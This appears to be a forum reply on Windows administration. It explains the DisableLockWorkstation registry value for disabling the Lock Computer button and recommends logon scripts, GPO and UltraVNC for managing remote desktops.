    To disable the Lock Computer button, open Regedit and browse to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System and create a new REG_DWORD value in each called DisableLockWorkstation. Setting this value to 0 will allow the Lock Computer button to be used, while 1 will disable it.

    and as a final thought... what are you doing to these computers that you need to unlock them anyways? Most tasks can be like i mentioned before updated via a logon script or the GPO editor. Those are skills you should work on. If you don't have access to that on your domain then you probably shouldn't be doing any kind of computer unlocking anyways... Also I like to run ultra vnc over the domain which can be setup to use mslogon if you want... but either way it's a lot handier than RDP for managing remote desktops without the user having to be logged out and you don't have to get out of your seat.
